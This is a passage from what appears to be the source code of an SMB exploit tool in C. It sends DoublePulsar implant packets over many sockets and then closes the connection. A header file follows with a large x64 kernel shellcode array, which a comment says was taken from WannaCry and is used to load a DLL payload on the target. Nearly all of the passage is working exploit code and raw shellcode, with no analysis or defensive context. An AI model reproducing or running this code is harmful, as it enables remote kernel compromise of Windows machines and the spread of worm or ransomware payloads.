sizeof(doublepulsar_packet2_socket3) - 1, 0); 446 | 447 | send(s4, (char*)doublepulsar_packet_socket4, sizeof(doublepulsar_packet_socket4) - 1, 0); 448 | send(s4, (char*)doublepulsar_packet2_socket4, sizeof(doublepulsar_packet2_socket4) - 1, 0); 449 | 450 | send(s5, (char*)doublepulsar_packet_socket5, sizeof(doublepulsar_packet_socket5) - 1, 0); 451 | send(s5, (char*)doublepulsar_packet2_socket5, sizeof(doublepulsar_packet2_socket5) - 1, 0); 452 | 453 | send(s6, (char*)doublepulsar_packet_socket6, sizeof(doublepulsar_packet_socket6) - 1, 0); 454 | send(s6, (char*)doublepulsar_packet2_socket6, sizeof(doublepulsar_packet2_socket6) - 1, 0); 455 | send(s7, (char*)doublepulsar_packet_socket7, sizeof(doublepulsar_packet_socket7) - 1, 0); 456 | send(s7, (char*)doublepulsar_packet2_socket7, sizeof(doublepulsar_packet2_socket7) - 1, 0); 457 | send(s8, (char*)doublepulsar_packet_socket8, sizeof(doublepulsar_packet_socket8) - 1, 0); 458 | send(s8, (char*)doublepulsar_packet2_socket8, sizeof(doublepulsar_packet2_socket8) - 1, 0); 459 | send(s9, (char*)doublepulsar_packet_socket9, sizeof(doublepulsar_packet_socket9) - 1, 0); 460 | send(s9, (char*)doublepulsar_packet2_socket9, sizeof(doublepulsar_packet2_socket9) - 1, 0); 461 | send(s10, (char*)doublepulsar_packet_socket10, sizeof(doublepulsar_packet_socket10) - 1, 0); 462 | send(s10, (char*)doublepulsar_packet2_socket10, sizeof(doublepulsar_packet2_socket10) - 1, 0); 463 | send(s11, (char*)doublepulsar_packet_socket11, sizeof(doublepulsar_packet_socket11) - 1, 0); 464 | send(s11, (char*)doublepulsar_packet2_socket11, sizeof(doublepulsar_packet2_socket11) - 1, 0); 465 | send(s12, (char*)doublepulsar_packet_socket12, sizeof(doublepulsar_packet_socket12) - 1, 0); 466 | send(s12, (char*)doublepulsar_packet2_socket12, sizeof(doublepulsar_packet2_socket12) - 1, 0); 467 | send(s13, (char*)doublepulsar_packet_socket13, sizeof(doublepulsar_packet_socket13) - 1, 0); 468 | send(s13, (char*)doublepulsar_packet2_socket13, sizeof(doublepulsar_packet2_socket13) - 1, 0); 469 | send(s14, (char*)doublepulsar_packet_socket14, sizeof(doublepulsar_packet_socket14) - 1, 0); 470 | send(s14, (char*)doublepulsar_packet2_socket14, sizeof(doublepulsar_packet2_socket14) - 1, 0); 471 | send(s15, (char*)doublepulsar_packet_socket15, sizeof(doublepulsar_packet_socket15) - 1, 0); 472 | send(s15, (char*)doublepulsar_packet2_socket15, sizeof(doublepulsar_packet2_socket15) - 1, 0); 473 | 474 | send(s17, (char*)doublepulsar_packet_socket17, sizeof(doublepulsar_packet_socket17) - 1, 0); 475 | send(s17, (char*)doublepulsar_packet2_socket17, sizeof(doublepulsar_packet2_socket17) - 1, 0); 476 | send(s18, (char*)doublepulsar_packet_socket18, sizeof(doublepulsar_packet_socket18) - 1, 0); 477 | send(s18, (char*)doublepulsar_packet2_socket18, sizeof(doublepulsar_packet2_socket18) - 1, 0); 478 | send(s19, (char*)doublepulsar_packet_socket19, sizeof(doublepulsar_packet_socket19) - 1, 0); 479 | send(s19, (char*)doublepulsar_packet2_socket19, sizeof(doublepulsar_packet2_socket19) - 1, 0); 480 | send(s20, (char*)doublepulsar_packet_socket20, sizeof(doublepulsar_packet_socket20) - 1, 0); 481 | send(s20, (char*)doublepulsar_packet2_socket20, sizeof(doublepulsar_packet2_socket20) - 1, 0); 482 | 483 | send(s21, (char*)doublepulsar_packet_socket21, sizeof(doublepulsar_packet_socket21) - 1, 0); 484 | send(s21, (char*)doublepulsar_packet2_socket21, sizeof(doublepulsar_packet2_socket21) - 1, 0); 485 | 486 | //send doublepulsar packets 487 | send(s3, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 488 | send(s4, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 489 | send(s5, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 490 | send(s6, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 491 | send(s7, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 492 | send(s8, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 493 | send(s9, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 494 | send(s10, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 495 | send(s11, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 496 | send(s12, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 497 | send(s13, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 498 | send(s14, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 499 | send(s15, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 500 | //closed socket 16 already 501 | send(s17, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 502 | send(s18, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 503 | send(s19, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 504 | send(s20, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 505 | send(s21, (char*)doublepulsar_pkt, sizeof(doublepulsar_pkt) - 1, 0); 506 | 507 | //mass close sockets 508 | closesocket(s3); 509 | closesocket(s4); 510 | closesocket(s5); 511 | closesocket(s6); 512 | closesocket(s7); 513 | closesocket(s8); 514 | closesocket(s9); 515 | closesocket(s10); 516 | closesocket(s11); 517 | closesocket(s12); 518 | closesocket(s13); 519 | closesocket(s14); 520 | closesocket(s15); 521 | closesocket(s17); 522 | 523 | //send disconnect 524 | send(s1, (char*)disconnect, sizeof(disconnect) - 1, 0); 525 | 526 | closesocket(s18); 527 | closesocket(s19); 528 | closesocket(s20); 529 | closesocket(s21); 530 | 531 | recv(s1, (char*)recvbuff, sizeof(recvbuff), 0); 532 | 533 | //send logoff 534 | send(s1, (char*)logoff, sizeof(logoff) - 1, 0); 535 | recv(s1, (char*)recvbuff, sizeof(recvbuff), 0); 536 | 537 | //close first socket 538 | closesocket(s1); 539 | 540 | //cleanup 541 | return 0; 542 | } 543 | -------------------------------------------------------------------------------- /Network.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | //64 bit kernel shellcode to run DLL - taken from Wannacry, this is sent before the DLL payload 4 | unsigned char x64_kernel_shellcode[] = 5 | "\x48\x89\xE0\x66\x83\xE4\xF0\x41\x57\x41\x56\x41\x55\x41\x54\x53" 6 | "\x51\x52\x55\x57\x56\x50\x50\xE8\xBC\x06\x00\x00\x48\x89\xC3\x48\xB9\xDF\x81\x14\x3E\x00\x00\x00\x00\xE8\x26" 7 | "\x05\x00\x00\x48\x85\xC0\x0F\x84\x55\x03\x00\x00\x48\x89\x05\x9C\x07\x00\x00\x48\xB9\xBA\x1E\x03\xA0\x00\x00" 8 | "\x00\x00\xE8\x07\x05\x00\x00\x48\x85\xC0\x0F\x84\x36\x03\x00\x00\x48\x89\x05\x85\x07\x00\x00\x48\xB9\x84\x06" 9 | "\xE7\xF9\xFF\xFF\xFF\xFF\xE8\xE8\x04\x00\x00\x48\x85\xC0\x0F\x84\x17\x03\x00\x00\x48\x89\x05\x6E\x07\x00\x00" 10 | "\x48\xB9\x4F\xFE\xEB\x15\x00\x00\x00\x00\xE8\xC9\x04\x00\x00\x48\x85\xC0\x0F\x84\xF8\x02\x00\x00\x48\x89\x05" 11 | "\x57\x07\x00\x00\x48\xB9\xF9\x30\xAC\xA4\x00\x00\x00\x00\xE8\xAA\x04\x00\x00\x48\x85\xC0\x0F\x84\xD9\x02\x00" 12 | "\x00\x48\x89\x05\x40\x07\x00\x00\x48\xB9\xCA\xBE\xD0\xEC\x00\x00\x00\x00\xE8\x8B\x04\x00\x00\x48\x85\xC0\x0F" 13 | "\x84\xBA\x02\x00\x00\x48\x89\x05\x29\x07\x00\x00\x48\xB9\xAE\xB8\x9F\x5D\xFF\xFF\xFF\xFF\xE8\x6C\x04\x00\x00" 14 | "\x48\x85\xC0\x0F\x84\x9B\x02\x00\x00\x48\x89\x05\x12\x07\x00\x00\x48\xB9\x94\x01\x69\xE3\xFF\xFF\xFF\xFF\xE8" 15 | "\x4D\x04\x00\x00\x48\x85\xC0\x0F\x84\x7C\x02\x00\x00\x48\x89\x05\xFB\x06\x00\x00\x48\xB9\xF6\x10\x00\xB8\xFF" 16 | "\xFF\xFF\xFF\xE8\x2E\x04\x00\x00\x48\x85\xC0\x0F\x84\x5D\x02\x00\x00\x48\x89\x05\xE4\x06\x00\x00\x48\xB9\xCA" 17 | "\xD6\x5F\xD2\xFF\xFF\xFF\xFF\xE8\x0F\x04\x00\x00\x48\x85\xC0\x0F\x84\x3E\x02\x00\x00\x48\x89\x05\xCD\x06\x00" 18 | "\x00\x48\xB9\x79\xA8\x24\x11\x00\x00\x00\x00\xE8\xF0\x03\x00\x00\x48\x85\xC0\x0F\x84\x1F\x02\x00\x00\x48\x89" 19 | "\x05\xB6\x06\x00\x00\x48\xB9\x37\xC6\x90\x4F\x00\x00\x00\x00\xE8\xD1\x03\x00\x00\x48\x85\xC0\x0F\x84\x00\x02" 20 | "\x00\x00\x48\x89\x05\x9F\x06\x00\x00\x48\xB9\x6C\xE7\xFE\x10\x00\x00\x00\x00\xE8\xB2\x03\x00\x00\x48\x85\xC0" 21 | "\x0F\x84\xE1\x01\x00\x00\x48\x89\x05\x88\x06\x00\x00\xE8\x4F\x03\x00\x00\x8B\x05\x85\x06\x00\x00\x85\xC0\x0F" 22 | "\x84\xC7\x01\x00\x00\xE8\xD9\x01\x00\x00\x48\x85\xC0\x0F\x84\xB9\x01\x00\x00\x4C\x8D\x0D\x94\x06\x00\x00\x41" 23 | "\x8B\x09\x51\x51\x6A\x40\x68\x00\x10\x00\x00\x4D\x31\xC0\x48\x8D\x15\xD2\x05\x00\x00\x48\xB9\xFF\xFF\xFF\xFF" 24 | "\xFF\xFF\xFF\xFF\x48\x83\xEC\x20\xFF\x15\x06\x06\x00\x00\x48\x83\xC4\x38\x59\x89\x0D\x5F\x06\x00\x00\x48\x85" 25 | "\xC0\x0F\x85\x22\x01\x00\x00\x48\x8D\x35\x57\x06\x00\x00\x48\x8B\x3D\x9C\x05\x00\x00\xF3\xA4\x80\x3D\x2F\x06" 26 | "\x00\x00\x01\x74\x05\xE8\x96\x02\x00\x00\x48\x8B\x35\x4D\x05\x00\x00\x8B\x0D\x0F\x06\x00\x00\x48\x01\xCE\x48" 27 | "\x89\xF1\x44\x8B\x25\x06\x06\x00\x00\x48\x8B\x11\x48\x39\xD6\x0F\x84\xDE\x00\x00\x00\x48\x31\xC0\x8B\x05\xDD" 28 | "\x05\x00\x00\x48\x29\xC2\x51\x52\x48\x89\xD1\x48\x83\xEC\x20\xFF\x15\xC3\x05\x00\x00\x48\x83\xC4\x20\x5A\x59" 29 | "\x48\x85\xC0\x74\x2E\x4D\x31\xC9\x44\x8B\x0D\xCE\x05\x00\x00\x4A\x8B\x04\x08\x48\x85\xC0\x74\x1B\x4C\x01\xE2" 30 | "\x80\x3D\xBF\x05\x00\x00\x01\x74\x07\x80\x3A\x01\x74\x0F\xEB\x08\x8B\x02\x0F\xBA\xE0\x05\x72\x05\x48\x8B\x09" 31 | "\xEB\x9B\x4C\x29\xE2\x48\x89\x15\x0B\x05\x00\x00\x48\xBA\x90\x00\x00\x00\x00\x00\x00\x00\x48\x31\xC9\x48\x83" 32 | "\xEC\x40\xFF\x15\x3C\x05\x00\x00\x48\x83\xC4\x40\x48\x85\xC0\x74\x5B\x48\x89\x05\xEC\x04\x00\x00\xC6\x80\x80" 33 | "\x00\x00\x00\xC3\x48\x31\xC9\x51\x6A\x01\xFF\x35\xC9\x04\x00\x00\x51\x4C\x8D\x88\x80\x00\x00\x00\x4D\x31\xC0" 34 | "\x48\x8B\x15\xBF\x04\x00\x00\x48\x89\xC1\x48\x83\xEC\x20\xFF\x15\x02\x05\x00\x00\x48\x83\xC4\x40\x4D\x31\xC9" 35 | "\x4D\x31\xC0\x48\x31\xD2\x48\x8B\x0D\xA6\x04\x00\x00\x48\x83\xEC\x20\xFF\x15\xEC\x04\x00\x00\x48\x83\xC4\x20" 36 | "\x48\x83\xEC\x20\x48\x8D\x0D\x4D\x04\x00\x00\xFF\x15\xAF\x04\x00\x00\x48\x8B\x0D\x38\x04\x00\x00\xFF\x15\xAA" 37 | "\x04\x00\x00\x48\x83\xC4\x20\x48\x31\xC0\x48\x8D\x3D\x9A\xFC\xFF\xFF\x48\xB9\x70\x03\x00\x00\x00\x00\x00\x00" 38 | "\xF3\xAA\x48\x8D\x3D\x2A\x00\x00\x00\x48\xB9\xD3\x04\x00\x00\x00\x00\x00\x00\x48\x03\x0D\xE4\x04\x00\x00\xF3" 39 | "\xAA\x58\x58\x5E\x5F\x5D\x5A\x59\x5B\x41\x5C\x41\x5D\x41\x5E\x41\x5F\x48\x89\xC4\x48\x31\xC0\xC3\x53\x56\x51" 40 | "\x52\x48\xB9\x08\x00\x00\x00\x00\x00\x00\x00\x51\x48\x8D\x15\xD1\x03\x00\x00\x48\x83\xEC\x20\xFF\x15\x17\x04" 41 | "\x00\x00\x48\x83\xC4\x20\x48\x85\xC0\x0F\x85\xDD\x00\x00\x00\x48\x8B\x35\xB3\x03\x00\x00\x48\x31\xDB\x8B\x1D" 42 | "\x66\x04\x00\x00\x8B\x04\x1E\x83\xF8\x02\x0F\x8C\xB0\x00\x00\x00\x48\x89\xF1\x48\x83\xEC\x20\xFF\x15\xE9\x03" 43 | "\x00\x00\x48\x83\xC4\x20\xE8\x57\x02\x00\x00\x8B\x0D\x5A\x04\x00\x00\x39\xC8\x0F\x85\x8C\x00\x00\x00\x48\x8D" 44 | "\x15\x7B\x03\x00\x00\x48\x89\xF1\x48\x83\xEC\x20\xFF\x15\xC6\x03\x00\x00\x48\x89\xF1\xFF\x15\xC5\x03\x00\x00" 45 | "\x48\x83\xC4\x20\x48\x85\xC0\x74\x49\x48\x31\xDB\x8B\x1D\x0B\x04\x00\x00\x48\x8B\x04\x18\x48\x85\xC0\x74\x37" 46 | "\x48\x31\xC9\x8B\x1D\xFD\x03\x00\x00\x66\x8B\x0C\x18\x48\x8B\x44\x18\x08\x48\x85\xC0\x74\x20\x48\x31\xDB\x8B" 47 | "\x1D\x02\x04\x00\x00\x48\x29\xD9\x7C\x12\x48\x01\xC8\xE8\x2B\x02\x00\x00\x8B\x0D\xEB\x03\x00\x00\x39\xC8\x74" 48 | "\x3F\x31\xC0\x89\x05\x03\x03\x00\x00\x48\x8D\x0D\x04\x03\x00\x00\x48\x83\xEC\x20\xFF\x15\x62\x03\x00\x00\x48" 49 | "\x83\xC4\x20\x48\x89\xF1\x48\x83\xEC\x20\xFF\x15\x59\x03\x00\x00\x48\x83\xC4\x20\x59\x81\xF9\x00\x00\x01\x00" 50 | "\x7F\x0E\x83\xC1\x04\xE9\xF3\xFE\xFF\xFF\x59\x48\x89\xF0\xEB\x03\x48\x31\xC0\x5A\x59\x5E\x5B\xC3\x48\x8B\x35" 51 | "\xB7\x02\x00\x00\x8B\x0D\x79\x03\x00\x00\x48\x01\xCE\x48\x8B\x16\x8B\x05\x5D\x03\x00\x00\x48\x29\xC2\x48\x31" 52 | "\xC0\x48\xFF\xC8\x48\xC1\xE0\x2C\x48\x8B\x12\x48\x39\xC2\x72\x0B\xB8\xE8\x03\x00\x00\x89\x05\x3D\x03\x00\x00" 53 | "\xC3\x56\x51\x52\x48\x83\xEC\x20\xFF\x15\x1F\x03\x00\x00\x48\x89\xC6\x8B\x05\x36\x03\x00\x00\x48\x01\xC6\xFF" 54 | "\x15\x05\x03\x00\x00\x48\x89\xF1\x48\x39\xF0\x77\x17\x48\x8D\x90\x00\x05\x00\x00\x48\x39\xF2\x72\x0B\x48\x29" 55 | "\xC6\x89\x35\x00\x03\x00\x00\xEB\x08\x48\x8B\x36\x48\x39\xCE\x75\xDC\x48\x83\xC4\x20\x5A\x59\x5E\xC3\x53\x52" 56 | "\x51\x55\x48\x89\xE5\x48\x81\xEC\x00\x01\x00\x00\x57\x48\x89\xCF\x48\x89\xD8\x48\x89\x85\x00\xFF\xFF\xFF\xE8" 57 | "\xBB\x00\x00\x00\x48\x89\x85\x08\xFF\xFF\xFF\xE8\x48\x01\x00\x00\x48\x89\x85\x10\xFF\xFF\xFF\x48\x8B\x85\x00" 58 | "\xFF\xFF\xFF\x48\x8B\x8D\x08\xFF\xFF\xFF\xE8\x9A\x01\x00\x00\x48\x89\x85\x18\xFF\xFF\xFF\x48\x8B\x85\x00\xFF" 59 | "\xFF\xFF\x48\x8B\x8D\x08\xFF\xFF\xFF\xE8\x8F\x01\x00\x00\x48\x89\x85\x20\xFF\xFF\xFF\x48\x8B\x85\x00\xFF\xFF" 60 | "\xFF\x48\x8B\x8D\x08\xFF\xFF\xFF\xE8\x84\x01\x00\x00\x48\x89\x85\x28\xFF\xFF\xFF\x48\x8B\x85\x00\xFF\xFF\xFF" 61 | "\x48\x89\xF9\x48\x8B\x95\x20\xFF\xFF\xFF\x48\x8B\x9D\x10\xFF\xFF\xFF\xE8\x0F\x01\x00\x00\x48\x89\x85\x30\xFF" 62 | "\xFF\xFF\x48\x8B\x85\x28\xFF\xFF\xFF\x48\x8B\x8D\x30\xFF\xFF\xFF\xE8\x55\x01\x00\x00\x66\x89\xC2\x48\x8B\x85" 63 | "\x00\xFF\xFF\xFF\x48\x8B\x8D\x18\xFF\xFF\xFF\xE8\x49\x01\x00\x00\x5F\x48\x81\xC4\x00\x01\x00\x00\x5D\x59\x5A" 64 | "\x5B\xC3\x56\x57\x48\x31\xF6\x8B\x70\x3C\x48\x01\xC6\x66\x81\x3E\x50\x45\x75\x12\x48\x81\xC6\x88\x00\x00\x00" 65 | "\x48\x31\xFF\x8B\x3E\x48\x01\xF8\x5F\x5E\xC3\x48\x31\xC0\xEB\xF8\x56\x51\x57\x48\x89\xC6\x48\x31\xC0\x89\xC7" 66 | "\xC1\xE7\x07\x29\xC7\x89\xF8\x31\xC9\x8A\x0E\x80\xF9\x00\x74\x07\x01\xC8\x48\xFF\xC6\xEB\xE7\x5F\x59\x5E\xC3" 67 | "\x56\x57\x52\x48\x89\xC6\x48\x31\xC0\x89\xC7\xC1\xE7\x07\x29\xC7\x89\xF8\x31\xD2\x8A\x16\x01\xD0\x48\xFF\xC6" 68 | "\xE2\xEC\x5A\x5F\x5E\xC3\x56\x51\x57\x48\x89\xC6\x48\x31\xC0\x89\xC7\xC1\xE7\x07\x29\xC7\x89\xF8\x31\xC9\x8A" 69 | "\x0E\x80\xF9\x00\x74\x0A\x01\xC8\x48\xFF\xC6\x48\xFF\xC6\xEB\xE4\x5F\x59\x5E\xC3\x56\x48\x89\xC6\x48\x83\xC6" 70 | "\x18\x48\x31\xC0\x8B\x06\x5E\xC3\x53\x65\x48\x8B\x04\x25\x38\x00\x00\x00\x48\x8B\x40\x04\x48\xC1\xE8\x0C\x48" 71 | "\xC1\xE0\x0C\x48\x8B\x18\x66\x81\xFB\x4D\x5A\x74\x08\x48\x2D\x00\x10\x00\x00\xEB\xEE\x5B\xC3\x57\x56\x51\x48" 72 | "\x31\xFF\x48\x89\xC6\x48\x31\xC0\x8B\x04\xBA\x48\x01\xF0\xE8\x40\xFF\xFF\xFF\x39\xC8\x74\x0E\x48\xFF\xC7\x48" 73 | "\x39\xDF\x74\x0B\xEB\xE4\x59\x5E\x5F\xC3\x48\x89\xF8\xEB\xF7\x48\x31\xC0\xEB\xF2\x56\x48\x89\xC6\x48\x31\xC0" 74 | "\x8B\x41\x1C\x48\x01\xF0\x5E\xC3\x56\x48\x89\xC6\x48\x31\xC0\x8B\x41\x20\x48\x01\xF0\x5E\xC3\x56\x48\x89\xC6" 75 | "\x48\x31\xC0\x8B\x41\x24\x48\x01\xF0\x5E\xC3\x48\xD1\xE1\x48\x01\xC8\x66\x8B\x00\xC3\x48\x81\xCA\x00\x00\xFF" 76 | "\xFF\x48\x81\xF2\x00\x00\xFF\xFF\x48\xC1\xE2\x02\x48\x01\xD1\x48\x31\xD2\x8B\x11\x48\x01\xD0\xC3\x00\x00\x00" 77 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 78 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 79 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 80 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 81 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 82 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 83 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x03\x00\x00" 84 | "\x20\x00\x00\x00\x70\x00\x00\x00\x08\x03\x00\x00\x4C\x00\x00\x00\xC8\x02\x00\x00\x01\x00\x00\x00\xBD\xA2\x37" 85 | "\x83\x00\x00\x00\x00\x00\x00\x00\x00\x8A\x23\x00\x00\x00\x00\x00\x00\x53\x55\x57\x56\x41\x54\x41\x55\x41\x56" 86 | "\x41\x57\x48\x89\xE0\x48\x89\xE1\x48\x83\xE1\x08\x48\x29\xCC\x48\x81\xEC\x00\x04\x00\x00\xE8\x00\x00\x00\x00" 87 | "\x5D\x48\x89\xE6\x48\x89\x06\x48\x81\xEC\x00\x04\x00\x00\x48\x8D\x3D\xD2\x0E\x00\x00\x49\x89\xF0\x48\x83\xC6" 88 | "\x08\x48\x31\xC9\x8A\x0F\x84\xC9\x74\x3F\x48\xFF\xC7\x8B\x0F\x48\x83\xC7\x04\x8B\x17\x48\x83\xC7\x04\x84\xD2" 89 | "\x74\x2C\xE8\xD4\x0D\x00\x00\x51\x0F\xB6\x0F\x48\x85\xC9\x59\x75\x09\x48\x85\xC0\x0F\x84\xB9\x0D\x00\x00\x48" 90 | "\x89\x06\x48\x83\xC6\x08\x30\xC0\x48\x83\xC7\x01\x3A\x47\x04\x74\xCC\xEB\xB8\x4C\x89\xC6\x48\x89\x25\x3D\x0D" 91 | "\x00\x00\x48\x89\x2D\x3E\x0D\x00\x00\x48\x89\x35\x3F\x0D\x00\x00\x90\xE8\x00\x00\x00\x00\x59\x4D\x31\xC9\x49" 92 | "\x89\xC8\x48\x31\xD2\xB2\x01\x48\x8D\x0D\x2E\x0D\x00\x00\x48\x83\xEC\x20\xFF\x56\x38\x48\x83\xC4\x20\x49\xB9" 93 | "\x40\x00\x00\x00\x00\x00\x00\x00\x49\xB8\x00\x30\x00\x00\x00\x00\x00\x00\x48\x31\xD2\x8B\x95\x5D\x0F\x00\x00" 94 | "\x48\x31\xC9\x48\x83\xEC\x20\xFF\x56\x08\x48\x83\xC4\x20\x48\x85\xC0\x0F\x84\xCF\x0C\x00\x00\x48\x89\xC3\x56" 95 | "\x8B\x8D\x5D\x0F\x00\x00\x48\x8D\x35\x80\x0E\x00\x00\x48\x89\xDF\xF3\xA4\x5E\x48\x89\x5E\x48\x48\x31\xC0\x8B" 96 | "\x85\x5D\x0F\x00\x00\x48\x89\x46\x50\x48\x31\xC9\x8B\x8D\x5D\x0F\x00\x00\x48\x8D\x3D\x59\x0E\x00\x00\x31\xC0" 97 | "\xF3\xAA\x48\x31\xC0\x48\x89\x46\x58\x48\x89\x46\x60\x48\x89\x46\x68\x48\x8D\x05\x77\x09\x00\x00\x48\x89\x05" 98 | "\xC4\x02\x00\x00\x48\x8D\x05\x71\x09\x00\x00\x48\x89\x05\xBE\x02\x00\x00\x48\x8D\x05\x78\x09\x00\x00\x48\x89" 99 | "\x05\xB8\x02\x00\x00\x48\x8D\x05\x86\x09\x00\x00\x48\x89\x05\xB2\x02\x00\x00\x48\x8D\x05\xA7\x08\x00\x00\x48" 100 | "\x89\x05\xAC\x02\x00\x00\x55\x48\x8D\x2D\xD6\x01\x00\x00\x48\x8B\x7E\x48\xE8\xA3\x02\x00\x00\x48\x85\xC0\x0F" 101 | "\x85\x13\x01\x00\x00\xE8\x1A\x03\x00\x00\x48\x85\xC0\x0F\x84\x05\x01\x00\x00\x48\x89\x45\x20\x48\x8B\x7D\x08" 102 | "\x48\x83\xC7\x30\x48\x8B\x3F\x48\x8B\x45\x20\x48\x29\xF8\x48\x89\x45\x28\xE8\x64\x03\x00\x00\x48\x85\xC0\x0F" 103 | "\x85\xDD\x00\x00\x00\xE8\xE6\x03\x00\x00\x48\x85\xC0\x0F\x85\xCF\x00\x00\x00\xE8\x4E\x05\x00\x00\x48\x85\xC0" 104 | "\x0F\x85\xC1\x00\x00\x00\xE8\x57\x05\x00\x00\x48\x85\xC0\x0F\x85\xB3\x00\x00\x00\xE8\x57\x06\x00\x00\x48\x85" 105 | "\xC0\x0F\x85\xA5\x00\x00\x00\xE8\xBA\x06\x00\x00\x48\x85\xC0\x0F\x85\x97\x00\x00\x00\xE8\xC6\x07\x00\x00\x48" 106 | "\x85\xC0\x0F\x85\x89\x00\x00\x00\x48\x8B\x45\x20\x48\x89\x46\x70\x48\x8B\x45\x18\x48\x89\x46\x78\x5D\x8B\x85" 107 | "\x61\x0F\x00\x00\x89\x86\x80\x00\x00\x00\x48\x8B\x56\x70\x48\x63\x42\x3C\x48\x8D\x9C\x10\x88\x00\x00\x00\x48" 108 | "\x85\xDB\x74\x48\x8B\x1B\x48\x01\xD3\x83\x7B\x14\x00\x74\x3D\x8B\xBE\x80\x00\x00\x00\x2B\x7B\x10\x3B\x7B\x14" 109 | "\x7F\x2F\x8B\x4B\x1C\x48\x01\xD1\x8B\x04\xB9\x48\x01\xD0\x48\x83\xEC\x20\x4C\x8B\x46\x50\x48\x8B\x56\x48\x48" 110 | "\xB9\x02\x00\x00\x00\x00\x00\x00\x00\xFF\xD0\x48\x83\xC4\x20\x48\x89\x86\x88\x00\x00\x00\x55\x48\x8D\x2D\xB8" 111 | "\x00\x00\x00\xE8\x28\x07\x00\x00\xEB\x00\x48\x8B\x4D\x78\x48\x85\xC9\x74\x0B\x48\x83\xEC\x20\xFF\x56\x40\x48" 112 | "\x83\xC4\x20\x48\x8B\x7D\x20\x48\x85\xFF\x0F\x84\x8A\x00\x00\x00\x4C\x8D\x8D\xAA\x00\x00\x00\x49\xB8\x40\x00" 113 | "\x00\x00\x00\x00\x00\x00\x48\x8B\x55\x50\x48\x8B\x4D\x20\x48\x83\xEC\x20\xFF\x56\x30\x48\x83\xC4\x20\x48\x85" 114 | "\xC0\x74\x09\x48\x8B\x4D\x50\x48\x31\xC0\xF3\xAA\x49\xB8\x00\x80\x00\x00\x00\x00\x00\x00\x48\xBA\x00\x00\x00" 115 | "\x00\x00\x00\x00\x00\x48\x8B\x4D\x20\x48\x83\xEC\x20\xFF\x56\x10\x48\x83\xC4\x20\x48\x8B\x7D\x60\x48\x85\xFF" 116 | "\x74\x2C\x48\x8B\x4D\x68\x48\x31\xC0\xF3\xAA\x49\xB8\x00\x80\x00\x00\x00\x00\x00\x00\x48\xBA\x00\x00\x00\x00" 117 | "\x00\x00\x00\x00\x48\x8B\x4D\x60\x48\x83\xEC\x20\xFF\x56\x10\x48\x83\xC4\x20\x5D\xE9\x60\x0A\x00\x00\x00\x00" 118 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 119 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 120 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 121 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 122 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x48\xB8\xFF\xFF\xFF\xFF\xFF\xFF\xFF" 123 | "\xFF\xE9\x2E\xFC\xFF\xFF\x6D\x73\x76\x63\x72\x74\x2E\x64\x6C\x6C\x00\x6D\x73\x76\x63\x72\x74\x64\x2E\x64\x6C" 124 | "\x6C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 125 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x57\x52\x53\x48" 126 | "\x89\x7D\x00\x48\x89\xFA\x48\x83\xC2\x00\x66\x8B\x1A\x66\x81\xFB\x4D\x5A\x75\x63\x48\x89\xFA\x48\x83\xC2\x3C" 127 | 